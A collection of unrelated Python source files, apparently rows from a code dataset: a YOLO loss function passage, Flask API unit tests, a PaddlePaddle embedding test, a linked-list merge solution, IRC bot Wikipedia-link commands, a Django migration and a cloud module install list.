ep_chk = torch.zeros(truemat.size())
ep_chk = ep_chk.fill_(epin)
ep_chk = torch.lt(ep_chk, 200.0)
ep_chk = ep_chk.to(device)
truemat = torch.where(ep_chk, warmmat, truemat)
return truemat
def process_ytrue_mat(ytrue, cellgrid, gridtrch, anchorz, epin):
# get x and y relative to box
truexy = ytrue[..., 0:2]
# adjust to relative to whole image
truexywi = torch.div(torch.add(truexy, cellgrid), gridtrch)
warmxy = torch.empty(truexy.size()).to(device)
warmxy = warmxy.fill_(0.5)
warmxywi = torch.div(torch.add(warmxy, cellgrid), gridtrch)
#truexy = warm_select(epin, warmxy, truexy)
#truexywi = warm_select(epin, warmxywi, truexywi)
# get w and h
truewhwi = ytrue[..., 2:4]
# adjust w and h
truewh = torch.div(torch.mul(truewhwi, gridtrch), anchorz)
truewh_mask = torch.gt(truewh, 0.000001).type(torch.FloatTensor).to(device)
truewh = torch.log(torch.add(truewh, 0.000001))
truewh = torch.mul(truewh, truewh_mask)
warmwh = torch.zeros(truewh.size()).to(device)
warmwhwi = torch.ones(truewhwi.size()).to(device)
warmwhwi = torch.div(torch.mul(warmwhwi, anchorz), gridtrch)
#truewh = warm_select(epin, warmwh, truewh)
#truewhwi = warm_select(epin, warmwhwi, truewhwi)
return truexy, truewh, truexywi, truewhwi
def get_iou_mat(truexywimat, truewhwimat, predxywi, predwhwi):
# adjust confidence
truewhhalf = torch.div(truewhwimat, 2.)
zeros_replace = torch.zeros(truexywimat.size()).to(device)
truemins = truexywimat - truewhhalf
# truemins = torch.max(truemins, zeros_replace)
ones_replace = torch.ones(truexywimat.size()).to(device)
truemaxes = torch.add(truexywimat, truewhhalf)
# truemaxes = torch.min(truemaxes, ones_replace)
trueareas = truemaxes - truemins
trueareas = torch.mul(trueareas[..., 0], trueareas[..., 1])
predwhhalf = torch.div(predwhwi, 2.)
predmins = predxywi - predwhhalf
# predmins = torch.max(predmins, zeros_replace)
predmaxes = torch.add(predxywi, predwhhalf)
predmaxes = torch.min(predmaxes, ones_replace)
intersectmins = torch.max(predmins, truemins)
intersectmaxes = torch.min(predmaxes, truemaxes)
zeros_replace2 = torch.zeros(intersectmaxes.size())
zeros_replace2 = zeros_replace2.to(device)
intersectwh = torch.max((intersectmaxes - intersectmins), zeros_replace2)
intersectareas = torch.mul(intersectwh[..., 0], intersectwh[..., 1])
predareas = predmaxes - predmins
predareas = torch.mul(predareas[..., 0], predareas[..., 1])
# add a small amount to avoid divide by zero, will later be multiplied by zero
unionareas = (torch.add(predareas, trueareas) - intersectareas)
iouscores = torch.div(intersectareas, unionareas)
return iouscores
obj_scale = scalez[0]
no_obj_scale = scalez[1]
class_scale = scalez[2]
coord_scale = scalez[3]
# Reshape predictions
y_pred = reshape_ypred(outputs)
# Define basic values
batchsz, gridh, gridw, ankz, finsiz = y_pred.size()
grid_trch = torch.from_numpy(np.array([gridw, gridh])).type(torch.FloatTensor)
grid_trch = grid_trch.to(device)
anchors1 = anchors.unsqueeze(0)
anchors1 = anchors1.unsqueeze(0)
anchors1 = anchors1.unsqueeze(0)
bndbxs_mask, bndbxs_mask2, bndbxs_mask4 = create_bndbx_masks(samp_bndbxs)
# Process Predictions
xy_pred, wh_pred, cf_pred, cl_pred = split_preds_multi(y_pred)
# mask = torch.ge(cf_pred, 0.5).type(torch.FloatTensor)
# mask = mask.unsqueeze(4).to(device)
# print("xy", round(torch.max(xy_pred).item(), 2), round(torch.min(xy_pred).item(), 2),
# "wh", round(torch.max(wh_pred).item(), 2), round(torch.min(wh_pred).item(), 2),
# "cf", round(torch.max(cf_pred).item(), 2), round(torch.min(cf_pred).item(), 2),
# "cl", round(torch.max(cl_pred).item(), 2), round(torch.min(cl_pred).item(), 2))
# Get predictions on whole image
pred_xy_wi = torch.div(torch.add(xy_pred, cell_grid), grid_trch)
pred_wh_wi = torch.div(torch.mul(torch.exp(wh_pred), anchors1), grid_trch)
# get whole image truths and no ones matrix from list of bound boxes
true_xy_wi_list, true_wh_wi_list = get_true_wi(samp_bndbxs, bndbxs_mask4)
no_ones = get_noones_mask(pred_xy_wi, pred_wh_wi, true_xy_wi_list, true_wh_wi_list, bndbxs_mask2, no_obj_thresh)
# get true values and whole image values from true matrix
true_xy, true_wh, true_xy_wi_mat, true_wh_wi_mat = process_ytrue_mat(y_true, cell_grid, grid_trch, anchors1, ep)
# print("true_xy", round(torch.max(true_xy).item(), 2), round(torch.min(true_xy).item(), 2),
# "true_wh", round(torch.max(true_wh).item(), 2), round(torch.min(true_wh).item(), 2),
# "true_xy_wi_mat", round(torch.max(true_xy_wi_mat).item(), 2),
# "true_wh_wi_mat", round(torch.max(true_wh_wi_mat).item(), 2))
iou_scores = get_iou_mat(true_xy_wi_mat, true_wh_wi_mat, pred_xy_wi, pred_wh_wi)
# print("iou score", round(torch.max(iou_scores).item(), 2))
ones = y_true[..., 4]
# warm_ones = torch.zeros(ones.size()).to(device)
warm_ones = torch.mul(ones, 0.01)
#ones = warm_select(ep, warm_ones, ones)
# print("xywi", round(torch.max(pred_xy_wi).item(), 2), round(torch.min(pred_xy_wi).item(), 2),
# "whwi", round(torch.max(pred_wh_wi).item(), 2), round(torch.min(pred_wh_wi).item(), 2))
loss_conf = iou_scores - cf_pred
loss_conf = torch.pow(loss_conf, 2)
loss_conf = torch.mul(loss_conf, ones)
loss_conf = torch.mul(loss_conf, obj_scale)
loss_conf = torch.sum(loss_conf)
zeros_replace6 = torch.zeros(cf_pred.size())
zeros_replace6 = zeros_replace6.to(device)
loss_noconf = zeros_replace6 - cf_pred
loss_noconf = torch.pow(loss_noconf, 2)
no_ones = no_ones.type(torch.FloatTensor)
no_ones = no_ones.to(device)
# warm_noones = torch.zeros(no_ones.size()).type(torch.FloatTensor)
# warm_noones = warm_noones.to(device)
# warm_noones = torch.mul(no_ones, 0.01)
# no_ones = warm_select(ep, warm_noones, no_ones)
loss_noconf = torch.mul(loss_noconf, no_ones)
loss_noconf = torch.mul(loss_noconf, no_obj_scale)
loss_noconf = torch.sum(loss_noconf)
ones = ones.unsqueeze(4)
ones_replace = torch.ones(cl_pred.size())
ones_replace = ones_replace.to(device)
class_true = y_true[..., 5:]
class_true = class_true.to(device)
loss_class = class_true - cl_pred
loss_class = torch.pow(loss_class, 2)
loss_class = torch.mul(loss_class, ones)
loss_class = torch.mul(loss_class, class_scale)
loss_class = torch.sum(loss_class)
#warm_ones = warm_ones.fill_(0.01)
#ones = warm_select(ep, warm_ones, ones)
loss_xy = torch.pow((true_xy - xy_pred), 2)
loss_xy = torch.mul(loss_xy, ones)
loss_xy = torch.mul(loss_xy, coord_scale)
loss_xy = torch.sum(loss_xy)
loss_wh = torch.pow((true_wh - wh_pred), 2)
loss_wh = torch.mul(loss_wh, ones)
loss_wh = torch.mul(loss_wh, ones)
loss_wh = torch.sum(loss_wh)
# outz = [loss_conf, loss_noconf, loss_class, loss_wh, loss_xy]
loss = loss_conf + loss_noconf + loss_wh + loss_xy + loss_class
# print("total loss", round(loss.item(), 2),
# "conf", round(loss_conf.item(), 2),
# "noconf", round(loss_noconf.item(), 2),
# "class", round(loss_class.item(), 2),
# "size", round(loss_wh.item(), 2),
# "centre", round(loss_xy.item(), 2))
return loss
"""
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
outputs = torch.randn(4, 10, 20, 30)
outputs = outputs.to(device)
bndbxs = np.array([0, 0.35, 0.3, 0.2, 0.25])
bndbxs_pad = np.empty((13,5))
bndbxs = np.vstack((bndbxs, bndbxs_pad))
bndbxs = np.expand_dims(bndbxs, 0)
bndbxs = np.vstack((bndbxs, bndbxs, bndbxs, bndbxs))
bndbxs = torch.from_numpy(bndbxs).type(torch.FloatTensor)
bndbxs = bndbxs.to(device)
y_true = torch.zeros(4, 10, 20, 5, 6)
y_true[0, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[1, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[2, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true[3, 3, 6, 0, :] = torch.from_numpy(np.array([0.5, 0, 0.2, 0.25, 1.0, 1.0]))
y_true = y_true.to(device)
anchors_in = [[2.387088, 2.985595], [1.540179, 1.654902], [3.961755, 3.936809], [2.681468, 1.803889],
[5.319540, 6.116692]]
anchors_in = torch.from_numpy(np.array(anchors_in)).type(torch.FloatTensor)
anchors_in = anchors_in.to(device)
scalez = [1, 0.5, 1, 1]
batchsz, gridh, gridw, longout = outputs.size()
cell_x = np.reshape(np.tile(np.arange(gridw), gridh), (1, gridh, gridw, 1))
cell_y = np.reshape(np.repeat(np.arange(gridh), gridw), (1, gridh, gridw, 1))
# combine to give grid
cell_grid = np.tile(np.stack([cell_x, cell_y], -1), [1, 1, 1, 5, 1])
cell_grid = torch.from_numpy(cell_grid).type(torch.FloatTensor)
cell_grid = cell_grid.to(device)
criterion = YoloLoss()
loss = criterion(outputs, bndbxs, y_true, anchors_in, 0.3, scalez, cell_grid, 0)
print(loss)
# x = torch.zeros(10)
# y = 1/x # tensor with all infinities
# print(y)
# y[y == float('inf')] = 0
# print(y)
"""
|
import unittest
from unittest import mock
from airfield.util import dependency_injection as di
from airfield.adapter.marathon import MarathonAdapter, InstanceState
from airfield.adapter.kv import KVAdapter
from airfield.util import logging
from tests.mocks.marathon_adapter import MarathonAdapterMock
from tests.mocks.kv import InMemoryKVAdapter
import json
class InstanceApiTest(unittest.TestCase):
def setUp(self):
logging.silence()
di.test_setup_clear_registry()
self.marathon_adapter_mock = MarathonAdapterMock()
self.kv_mock = InMemoryKVAdapter()
di.register(MarathonAdapter, self.marathon_adapter_mock)
di.register(KVAdapter, self.kv_mock)
from airfield.app import create_app
self.app = create_app()
self.app.testing = True
self.client = self.app.test_client()
def tearDown(self):
di.test_setup_clear_registry()
def test_get_prices(self):
result = self.client.get("/api/instance_prices")
data = result.get_json()
self.assertEqual(data, {
'cost_tracking_enabled': False,
'cost_currency': 'EURO',
'cost_core_per_minute': 0.0,
'cost_gb_per_minute': 0.0
})
def test_calculate_costs(self):
json_string = json.dumps({
'spark': {
'cores_max': 4,
'executor_cores': 1,
'executor_memory': 1024
},
'notebook': {
'cores': 4,
'memory': 1024
}
})
result = self.client.get(f"/api/instance_costs?configuration={json_string}")
data = result.get_json()
self.assertEqual(data, {'costs_per_hour': 0.0})
def test_get_instances(self):
response = self.client.get("/api/instance")
data = response.get_json()
self.assertEqual(data, dict(instances=[]))
def test_create_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict(comment="foobar", delete_at="2000-01-01", notebook=dict(cores=4)))
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
app_definition = self.marathon_adapter_mock.value_deploy_instance()
self.assertEqual(app_definition["cpus"], 4)
response = self.client.get("/api/instance")
data = response.get_json()["instances"]
self.assertTrue(len(data) == 1)
instance = data[0]
self.assertEqual(instance_id, instance["instance_id"])
self.assertEqual("foobar", instance["details"]["comment"])
self.assertEqual("2000-01-01T00:00:00", instance["details"]["delete_at"])
def test_get_instance_credentials(self):
configuration = dict(
configuration=dict(usermanagement=dict(enabled=True, users=dict(admin="notsecure", random=None))))
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
response = self.client.get("/api/instance/{}/credentials".format(instance_id))
credentials = response.get_json()
self.assertTrue("admin" in credentials)
self.assertEqual("notsecure", credentials["admin"])
self.assertTrue("random" in credentials)
self.assertIsNotNone(credentials["random"])
def test_delete_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.NOT_FOUND)
configuration = dict(configuration=dict())
response = self.client.post("/api/instance", json=configuration)
data = response.get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
response = self.client.delete("/api/instance/{}".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(self.client.get("/api/instance").get_json()["instances"], [])
data = self.client.get("/api/instance?deleted=true").get_json()["instances"]
self.assertTrue(len(data) == 1)
instance = data[0]
self.assertEqual(instance_id, instance["instance_id"])
self.assertTrue("deleted_at" in instance["details"])
def test_update_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict(admin=dict(group="test")))
data = self.client.post("/api/instance", json=configuration).get_json()
self.assertTrue("instance_id" in data)
instance_id = data["instance_id"]
configuration["configuration"]["comment"] = "foobar"
configuration["configuration"]["notebook"] = dict(cores=4)
configuration["configuration"]["admin"] = dict(group="foobar")
response = self.client.put("/api/instance/{}".format(instance_id), json=configuration)
self.assertEqual(response.status_code, 200)
response = self.client.get("/api/instance/{}/configuration".format(instance_id)).get_json()
self.assertEqual(response["comment"], "foobar")
self.assertEqual(response["notebook"]["cores"], 4)
self.assertEqual(response["admin"]["group"], "test")
app_definition = self.marathon_adapter_mock.value_deploy_instance()
self.assertEqual(app_definition["cpus"], 4)
def test_restart_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/restart".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "restarted")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_restart_instance())
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/restart".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "started")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_start_instance())
def test_stop_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/stop".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "stopped")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_stop_instance())
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/stop".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "")
def test_start_instance(self):
self.marathon_adapter_mock.value_get_instance_status(InstanceState.HEALTHY)
configuration = dict(configuration=dict())
instance_id = self.client.post("/api/instance", json=configuration).get_json()["instance_id"]
response = self.client.post("/api/instance/{}/start".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "")
self.marathon_adapter_mock.value_get_instance_status(InstanceState.STOPPED)
response = self.client.post("/api/instance/{}/start".format(instance_id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.get_json()["status"], "started")
self.assertTrue(instance_id in self.marathon_adapter_mock.value_start_instance())
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import paddle
from test_dist_base import runtime_main, TestParallelDyGraphRunnerBase
from paddle.nn import Layer, Embedding
paddle.set_default_dtype("float64")
class SimpleNet(Layer):
def __init__(self,
hidden_size,
vocab_size,
num_steps=20,
init_scale=0.1,
is_sparse=False,
dtype="float64"):
super(SimpleNet, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.init_scale = init_scale
self.num_steps = num_steps
self.embedding = Embedding(
self.vocab_size,
self.hidden_size,
sparse=True,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Uniform(low=-init_scale,
high=init_scale)))
self.softmax_weight = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
low=-self.init_scale, high=self.init_scale))
self.softmax_bias = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
low=-self.init_scale, high=self.init_scale))
self.tmp = self.create_parameter(
attr=paddle.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype=dtype,
default_initializer=paddle.nn.initializer.Uniform(
low=-self.init_scale, high=self.init_scale))
def forward(self, input, label):
x_emb = self.embedding(input)
fc = paddle.matmul(x_emb, self.softmax_weight)
fc = paddle.add(fc, self.softmax_bias)
projection = paddle.reshape(fc, shape=[-1, self.vocab_size])
loss = paddle.nn.functional.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = paddle.reshape(loss, shape=[-1, self.num_steps])
loss = paddle.mean(loss, axis=[0])
loss = paddle.sum(loss)
return loss
# global configs
batch_size = 4
batch_num = 200
hidden_size = 10
vocab_size = 1000
num_steps = 3
init_scale = 0.1
def fake_sample_reader():
def __reader__():
for i in range(batch_num):
x_data = np.arange(num_steps).astype('int64')
y_data = np.arange(1, 1 + num_steps).astype('int64')
yield x_data, y_data
return __reader__
class TestSparseEmbeddingFP64(TestParallelDyGraphRunnerBase):
def get_model(self):
model = SimpleNet(hidden_size=hidden_size,
vocab_size=vocab_size,
num_steps=num_steps,
init_scale=init_scale,
is_sparse=True)
train_reader = paddle.batch(fake_sample_reader(),
batch_size=batch_size,
drop_last=True)
optimizer = paddle.optimizer.SGD(learning_rate=0.001,
parameters=model.parameters())
return model, train_reader, optimizer
def run_one_loop(self, model, optimizer, batch):
x_data = np.array([x[0].reshape(3) for x in batch]).astype('int64')
y_data = np.array([x[1].reshape(3) for x in batch]).astype('int64')
x_data = x_data.reshape((-1, num_steps, 1))
y_data = y_data.reshape((-1, 1))
x = paddle.to_tensor(x_data)
y = paddle.to_tensor(y_data)
dy_loss = model(x, y)
return dy_loss
if __name__ == "__main__":
runtime_main(TestSparseEmbeddingFP64)
|
'''https://app.codesignal.com/interview-practice/task/6rE3maCQwrZS3Mm2H
Note: Your solution should have O(l1.length + l2.length) time
complexity, since this is what you will be asked to accomplish in an
interview.
Given two singly linked lists sorted in non-decreasing order, your
task is to merge them. In other words, return a singly linked list,
also sorted in non-decreasing order, that contains the elements from
both original lists.
Example
For l1 = [1, 2, 3] and l2 = [4, 5, 6], the output should be
mergeTwoLinkedLists(l1, l2) = [1, 2, 3, 4, 5, 6];
For l1 = [1, 1, 2, 4] and l2 = [0, 3, 5], the output should be
mergeTwoLinkedLists(l1, l2) = [0, 1, 1, 2, 3, 4, 5].
Input/Output
[execution time limit] 4 seconds (py3)
[input] linkedlist.integer l1
A singly linked list of integers.
Guaranteed constraints:
0 ≤ list size ≤ 104,
-109 ≤ element value ≤ 109.
[input] linkedlist.integer l2
A singly linked list of integers.
Guaranteed constraints:
0 ≤ list size ≤ 104,
-109 ≤ element value ≤ 109.
[output] linkedlist.integer
A list that contains elements from both l1 and l2, sorted in non-decreasing order.
'''
# Singly-linked lists are already defined with this interface:
# class ListNode(object):
# def __init__(self, x):
# self.value = x
# self.next = None
#
def mergeTwoLinkedLists(l1, l2):
'''Given two singly linked lists sorted in non-decreasing order, your
task is to merge them. In other words, return a singly linked
list, also sorted in non-decreasing order, that contains the
elements from both original lists.
'''
'''
Approach:
'''
if l1 == None:
return l2
if l2 == None:
return l1
# start is a pointer so we can easily return at the end
start = ListNode(None)
# declare current to track the new list through the traverse
current = start
while l1 != None and l2 != None:
if (l1.value < l2.value):
# link up the lowest of the next two values
current.next = l1
# move current forward
current = current.next
if l1.next == None:
current.next = l2
break
l1 = l1.next
else:
# mirrored code for the other list
current.next = l2
current = current.next
if l2.next == None:
current.next = l1
break
l2 = l2.next
return start.next
# Testing
# For l1 = [1, 1, 2, 4] and l2 = [0, 3, 5], the output should be
# mergeTwoLinkedLists(l1, l2) = [0, 1, 1, 2, 3, 4, 5].
|
# Copyright (c) 2013 Molly White
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERchannelTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN c.con WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
from urllib import parse
def link(c, channel, command_type, line):
'''Return a link to the Wikipedia article; formatted as !link [[Article]]'''
regex = re.compile("!?link\s([\[|\{]{2}(.*)[\]|\}]{2})",re.IGNORECASE)
r = re.search(regex, line)
if r:
article_name = r.group(2)
if article_name == None:
c.con.say("Please format the command as !link [[article]] or !link {{template}}.", channel)
return 0
else:
article_name = article_name.replace(" ", "_")
url = parse.quote(article_name, safe="/#:")
if "{{" in r.group(1):
url = "http://en.wikipedia.org/wiki/Template:" + url
else:
url = "http://en.wikipedia.org/wiki/" + url
c.con.say(url, channel)
else:
c.con.say("Please format the command as !link [[article]] or !link {{template}}.", channel)
def user(c, channel, command_type, line):
'''Returns a link to the userpage; command formatted as !user Username'''
regex = re.compile("!?user\s(.*)",re.IGNORECASE)
r = re.search(regex, line)
if r:
username = r.group(1)
username = username.strip("[]{}").replace(" ", "_")
url = parse.quote(username, safe="/#:")
url = "http://en.wikipedia.org/wiki/User:" + url
c.con.say(url, channel)
else:
c.con.say("Please format this command as !usertalk username.", channel)
def usertalk(c, channel, command_type, line):
'''Returns a link to the user talk page; command formatted as !usertalk Username'''
regex = re.compile("!?usertalk\s(.*)",re.IGNORECASE)
r = re.search(regex, line)
if r:
username = r.group(1)
username = username.strip("[]{}").replace(" ", "_")
url = parse.quote(username, safe="/#:")
url = "http://en.wikipedia.org/wiki/User_talk:" + url
c.con.say(url, channel)
else:
c.con.say("Please format this command as !usertalk username.", channel)
|
# Generated by Django 2.1.4 on 2019-02-13 05:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0005_alliance'),
]
operations = [
migrations.CreateModel(
name='CommentWords',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('q', models.CharField(max_length=100)),
('comment_words', models.TextField()),
],
),
]
|
# -*- coding: utf-8 -*-
"""
@file
@brief Defines a set of modules for more machine learning or student projects.
"""
from ..installhelper.module_install import ModuleInstall
def cloud_set():
"""
modules introduced by students or needed for student projects, it requires the modules in set *extended*
"""
mod = [
ModuleInstall("botocore", "pip", usage="AWS",
purpose="A low-level interface to a growing number of Amazon Web Services. " +
"The botocore package is the foundation for the AWS CLI as well as boto3."),
ModuleInstall("s3transfer", "pip", usage="AWS",
purpose="An Amazon S3 Transfer Manager"),
ModuleInstall("boto3", "pip", usage="AWS",
purpose="A Python interface to Amazon Web Services"),
ModuleInstall("s3fs", "pip", usage="AWS",
purpose="Convenient Filesystem interface over S3"),
ModuleInstall("boto", "pip",
purpose="Amazon Web Services Library"),
ModuleInstall("google-auth-httplib2", "pip", mname="google_auth_httplib2",
purpose="This library provides an httplib2 transport for google-auth."),
ModuleInstall("google-auth", "pip", mname="google_auth",
purpose="This library simplifies using Google’s various server-to-server " +
"authentication mechanisms to access Google APIs."),
ModuleInstall("google-api-python-client", "pip", mname="googleapiclient",
purpose="The Google API Client for Python is a client library for accessing the Plus, " +
"Moderator, and many other Google APIs."),
ModuleInstall("googlemaps", "pip",
purpose="Python client library for Google Maps API Web Services"),
ModuleInstall("python-gmaps", "pip", mname="gmaps",
purpose="Google Maps API client http://python-gmaps.readthedocs.org"),
]
mod.append(ModuleInstall("adal", "pip",
purpose="The ADAL for Python library makes it easy for python application to authenticate " +
"to Azure Active Directory (AAD) in order to access AAD protected web resources."))
mod.append(ModuleInstall("msrest", "pip",
purpose="AutoRest swagger generator Python client runtime."))
mod.append(ModuleInstall("msrestazure", "pip",
purpose="AutoRest swagger generator Python client runtime. Azure-specific module."))
for name in ['azure-nspkg',
'azure-common',
'azure-mgmt-nspkg',
'azure-mgmt-authorization',
'azure-mgmt-common',
'azure-storage',
'azure-mgmt-batch',
'azure-mgmt-cdn',
'azure-mgmt-cognitiveservices',
'azure-mgmt-commerce',
'azure-mgmt-compute',
'azure-mgmt-logic',
'azure-graphrbac',
'azure-mgmt-network',
'azure-mgmt-notificationhubs',
'azure-mgmt-powerbiembedded',
'azure-mgmt-redis',
'azure-mgmt-resource',
'azure-mgmt-scheduler',
'azure-mgmt-storage',
'azure-mgmt-web',
'azure-batch',
'azure-servicebus',
'azure-servicemanagement-legacy',
'azure-mgmt',
# addition 2017-05
"azure-keyvault",
"azure-datalake-store",
"azure-servicefabric",
"azure-mgmt-devtestlabs",
"azure-mgmt-documentdb",
"azure-mgmt-containerregistry",
"azure-mgmt-keyvault",
"azure-mgmt-dns",
"azure-mgmt-datalake-analytics",
"azure-mgmt-datalake-nspkg",
"azure-mgmt-trafficmanager",
"azure-mgmt-rdbms",
"azure-mgmt-datalake-store",
"azure-mgmt-iothub",
"azure-mgmt-sql",
"azure-mgmt-monitor",
# addition 2018-02
'azure_storage_common',
'azure_cosmosdb_nspkg',
'azure_cosmosdb_table',
'azure_eventgrid',
'azure_mgmt_advisor',
'azure_mgmt_applicationinsights',
'azure_mgmt_batchai',
'azure_mgmt_billing',
'azure_mgmt_consumption',
'azure_mgmt_containerinstance',
'azure_mgmt_containerservice',
'azure_mgmt_cosmosdb',
'azure_mgmt_datafactory',
'azure_mgmt_eventgrid',
'azure_mgmt_eventhub',
'azure_mgmt_hanaonazure',
'azure_mgmt_iothubprovisioningservices',
'azure_mgmt_loganalytics',
'azure_mgmt_machinelearningcompute',
'azure_mgmt_managementpartner',
'azure_mgmt_marketplaceordering',
'azure_mgmt_media',
'azure_mgmt_msi',
'azure_mgmt_recoveryservices',
'azure_mgmt_recoveryservicesbackup',
'azure_mgmt_relay',
'azure_mgmt_reservations',
'azure_mgmt_search',
'azure_mgmt_servermanager',
'azure_mgmt_servicebus',
'azure_mgmt_servicefabric',
'azure_mgmt_subscription',
'azure_storage_blob',
'azure_storage_file',
'azure_storage_queue',
'azure-storage-nspkg',
# addition 2019-01
'azure_loganalytics',
'azure_applicationinsights',
'azure_mgmt_iotcentral',
'azure_mgmt_datamigration',
'azure_mgmt_maps',
'azure_mgmt_policyinsights',
'azure_mgmt_managementgroups',
'azure_mgmt_devspaces',
'azure_mgmt_signalr',
]:
# azure part
mname = name.replace("-", ".").replace("_", ".")
if mname in ("azure.nspkg", "azure.mgmt.nspkg",
"azure.servicemanagement.legacy"):
skip_import = True
else:
skip_import = False
if mname == name:
mname = None
m = ModuleInstall(
name, "pip", mname=mname, pip_options=["--pre"],
purpose="Python wrapper for Azure API (HDInsight, Blog Storage)", usage="AZURE",
skip_import=skip_import)
mod.append(m)
mod.append(ModuleInstall("azureml", "pip",
purpose="Microsoft Azure Machine Learning Python client library"))
return [_ for _ in mod if _ is not None]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.